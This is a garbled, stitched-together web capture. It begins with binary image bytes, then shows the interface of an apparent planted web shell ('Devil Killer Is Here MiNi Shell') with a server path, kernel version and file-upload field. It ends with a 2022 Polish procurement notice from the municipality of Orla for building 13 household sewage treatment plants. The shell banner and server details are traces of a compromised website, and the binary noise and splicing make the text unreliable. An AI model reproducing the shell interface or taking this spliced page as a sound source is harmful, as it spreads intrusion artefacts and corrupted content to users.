JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0003968301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa przydomowych oczyszczalni ścieków na terenie gminy Orla </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ORLA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659600</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Orla</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-106</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">85 730 57 80</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">85 730 57 81</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugorla@orla.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.ug.orla.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa przydomowych oczyszczalni ścieków na terenie gminy Orla </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-626cc341-801b-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00039683</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037560/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa przydomowych oczyszczalni ścieków na terenie Gminy Orla</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich na operacje typu „Gospodarka wodno-ściekowa”, poddziałanie „Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii” w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/> 2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: zamowienia.publiczne@orla.pl<br/> 3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/> 4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/> 5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/> 6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/> 7. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny dotyczący RODO zawarty jest w Rozdziale XXIII</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GK.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa 13 przydomowych oczyszczalni ścieków na terenie gminy<br/>Orla. Przedsięwzięcie będzie realizowane na działkach ozn. nr geod.:<br/>- 77 w obrębie Wólka, gm. Orla;<br/>- 105/11, 210/1 w obrębie Gredele, gm. Orla;<br/>- 484/2 w obrębie Koszele, gm. Orla;<br/>- 242/2, 195/2 w obrębie Gregorowce, gm. Orla;<br/>- 1339, 302, 231/1, 696/2, 405 w obrębie Malinniki, gm. Orla;<br/>- 584/1, 585/2 w obrębie Mikłasze, gm. Orla.<br/>Przedmiot zamówienia obejmuje – budowę, montaż i rozruch 13 przydomowych oczyszczalni<br/>ścieków na terenie gminy Orla, spełniających wymogi normy PN-EN 12566-3, w tym:<br/>● 6 przydomowych oczyszczalni ścieków ze studnią chłonną,<br/>● 6 przydomowych oczyszczalni ścieków z drenażem rozsączającym,<br/>● 1 przydomową oczyszczalnię ścieków ze złożem obrotowym,<br/>zwany dalej „przydomowe oczyszczalnie ścieków”. Przedmiot zamówienia obejmuje w<br/>szczególności:<br/>1) roboty pomiarowe – wytyczenie geodezyjne<br/>2) roboty ziemne pod zbiorniki oraz instalacje przyłączeniowe;<br/>3) montaż zbiorników SBR;<br/>4) montaż przepompowni ścieków oczyszczonych;<br/>5) wykonanie odpowietrzenia instalacji;<br/>6) budowę studni chłonnych lub wykonanie drenażu rozsączającego, albo przydomowej<br/>oczyszczalni ścieków ze złożem obrotowym – w zależności od projektu (6 szt. – studni<br/>chłonnych, 6 szt. – drenażu rozsączającego, 1 szt. - przydomowej oczyszczalni ścieków ze<br/>złożem obrotowym);<br/>7) wykonanie instalacji elektrycznych zasilających przepompownie;<br/>8) przygotowanie podbudowy pod zbiornik;<br/>9) wykonanie inwentaryzacji powykonawczej oraz dokumentacji powykonawczej;<br/>10) przyłączenie istniejącej w budynku instalacji kanalizacji sanitarnej do nowo wybudowanej<br/>przydomowej oczyszczalni ścieków;<br/>11) uruchomienie oraz sprawdzenie szczelności przydomowych oczyszczalni ścieków;<br/>12) przeprowadzenie indywidualnego szkolenia dla wszystkich 13 użytkowników wraz z<br/>przekazaniem szczegółowych instrukcji obsługi i konserwacji;<br/>13) uzyskanie wszelkich uzgodnień, opinii wymaganych przepisami prawa od innych instytucji<br/>czy organów,<br/>14) przeprowadzenie prób eksploatacyjnych i końcowych (w tym rozruchu technologicznego);<br/>15) wykonanie przez Wykonawcę we własnym zakresie i na własny koszt wszelkich<br/>niezbędnych badań;<br/>16) uzyskanie badań pozwalających na stwierdzenie otrzymania parametrów oczyszczania<br/>ścieków spełniających wymogi normy PN-EN 12566-3+A2:2013 (wyniki należy przedstawić<br/>przed odbiorem);<br/>17) bezpłatne serwisowanie instalacji przydomowych oczyszczalni ścieków wraz z wymianą<br/>materiałów eksploatacyjnych w okresie gwarancji (wskazanym w formularzu ofertowym);<br/>18) przeprowadzenie m.in. raz w danym roku kalendarzowym – poczynając od roku<br/>następującego po roku rozpoczęcia użytkowania obiektu – przeglądu gwarancyjnego, przez cały<br/>zaoferowany okres gwarancji (chyba, że gwarancja producenta danego materiału wymaga<br/>częstszych przeglądów gwarancyjnych) oraz raz w roku badań, w celu potwierdzenia spełnienia<br/>wymagania normy PN-EN 12566-3+A2:2013 ;<br/>19) wykonanie pomiarów ochronnych instalacji elektrycznej przydomowej oczyszczalni ścieków.<br/>Badania instalacji musi przeprowadzić osoba z uprawnieniami nad eksploatacją E grupy 1;<br/>20) uporządkowanie terenu wraz z przywróceniem stanu pierwotnego obiektów naruszonych;<br/>Rozwiązania równoważne.<br/>1) Zamawiający informuje, iż zgodnie z art. 101 ust. 4 Pzp, jeżeli w opisie przedmiotu<br/>zamówienia znajdzie się odniesienie do norm, ocen technicznych, specyfikacji technicznych i<br/>systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 Pzp,<br/>Zamawiający dopuszcza rozwiązania równoważne opisanym;<br/>2) jeżeli w SWZ lub w załącznikach do SWZ przy opisie przedmiotu zamówienia wskazana<br/>została nazwa producenta, znak towarowy, patent lub pochodzenie, źródło lub szczególny<br/>proces, który charakteryzuje przedmiot dostarczany czy oferowany przez konkretnego<br/>wykonawcę, itp. Zamawiający wymaga aby traktować takie wskazanie jako przykładowe i<br/>dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń itp. równoważnych, o<br/>parametrach technicznych, jakościowych oraz funkcjonalnych nie gorszych niż wskazane. W<br/>takim przypadku przyjąć należy że parametry wskazanych rozwiązań przez Zamawiającego są<br/>minimalnymi parametrami technicznymi, jakościowymi i funkcjonalnymi jakie muszą być<br/>spełnione;<br/>3) użycie w SWZ lub załącznikach wymogu posiadania certyfikatu wydanego przez jednostkę<br/>oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę jako<br/>środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w<br/>opisie przedmiotu zamówienia lub warunkach realizacji zamówienia oznacza, że Zamawiający<br/>akceptuje również certyfikaty wydane przez inne równoważne jednostki oceniające zgodność.<br/>Zamawiający akceptuje także inne odpowiednie środki dowodowe na zasadach określonych wPzp;<br/>4) Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że<br/>oferowane przez niego rozwiązanie spełnia minimalne wymagania określone przez Zamawiającego w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232421-9 - Roboty w zakresie oczyszczania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45255600-5 - Roboty w zakresie kładzenia rur w kanalizacji</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>następującymi kryteriami oceny ofert: Cena (C) oraz Długość okresu gwarancji jakości (G). Punktacja<br/>przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do<br/>dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. W toku badania i oceny ofert Zamawiający<br/>może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (O)<br/>obliczoną na podstawie wzoru: O = C + G<br/>gdzie: O- łączna ilość punktów oferty ocenianej, C- liczba punktów uzyskanych w kryterium „Cena” G-<br/>liczba punktów uzyskanych w kryterium „Długość okresu gwarancji jakości”. Szczegółowy opis sposobu<br/>oceny ofert zawiera Rozdział XVII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale VIII niniejszej SWZ oraz spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w<br/>tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów – Zamawiający nie stawia warunku w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej – warunek zostanie uznany za spełniony, jeżeli<br/>Wykonawca wykaże, że:<br/>a) posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na kwotę minimum 120 000,00 zł (słownie złotych: sto dwadzieścia<br/>tysięcy),<br/>UWAGA: W przypadku, gdy złożone przez Wykonawcę dokumenty, oświadczenia dotyczące<br/>warunków udziału w postępowaniu zawierają dane/informacje w innych walutach niż PLN (złoty<br/>polski), Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji<br/>ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu ogłoszenia nie<br/>będzie opublikowany średni kurs walut przez NBP, Zamawiający przyjmie kurs przeliczeniowy z<br/>ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia o zamówieniu.<br/>4) zdolności technicznej i zawodowej – warunek zostanie uznany za spełniony, jeżeli<br/>Wykonawca wykaże, że:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwie roboty<br/>budowlane polegające na budowie minimum, po 5 przydomowych oczyszczalni ścieków każda<br/>wraz z podaniem ich rodzaju, wartości, daty oraz miejsca wykonania<br/>i podmiotów na rzecz których roboty te zostały wykonane, z załączeniem dowodów<br/>określających, czy roboty te zostały wykonane należycie, w szczególności informacji<br/>o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego<br/>i prawidłowo ukończone oraz przedłoży dokumenty potwierdzające, że roboty te zostały<br/>zrealizowane należycie,<br/>b) dysponuje osobą, która zostanie skierowana do realizacji przedmiotowego zamówienia<br/>publicznego, tj.:<br/>– kierownikiem budowy, posiadającym:<br/>● uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub równoważne bez ograniczeń,<br/>● doświadczenie zawodowe min. 5 lat oraz doświadczenie w pełnieniu w tym okresie funkcji<br/>kierownika budowy na co najmniej jednej ukończonej budowie polegające na budowie minimum<br/>5 przydomowych oczyszczalni ścieków w ramach jednego zadania;<br/>– kierownikiem robót elektrycznych w zakresie budowy instalacji elektrycznych i przebudowy linii<br/>i sieci nN, posiadającym:<br/>● uprawnienia budowlane do kierowania robotami budowlanymi o specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważne bez<br/>ograniczeń,<br/>● doświadczenie zawodowe min. 3 lata oraz doświadczenie w pełnieniu w tym okresie funkcji<br/>kierownika robót elektrycznych na co najmniej jednej ukończonej budowie, polegającej na<br/>budowie minimum 5 przydomowych oczyszczalni ścieków w ramach jednego zadania.<br/>UWAGA: Zamawiający wymaga aby ww. osoby, które zostaną skierowane do realizacji<br/>przedmiotowego zamówienia publicznego posiadały uprawnienia,<br/>o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r.<br/>poz. 1333 z późn. zm.) oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia<br/>29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im ważne<br/>uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub<br/>odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę<br/>lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (Dz. U z 2021 r. poz. 1646), lub zamierzającymi świadczyć usługi<br/>transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000<br/>r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U.<br/>2019 r. poz. 1117).<br/>Zamawiający dopuszcza łączenie stanowisk wyszczególnionych powyżej tylko pod warunkiem<br/>spełnienia łącznie wymagań dotyczących kwalifikacji i doświadczenia dla danych stanowisk.<br/>2. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej –<br/>dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>3. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>4. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w oparciu o oświadczenia i dokumenty określone w rozdziale IX. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 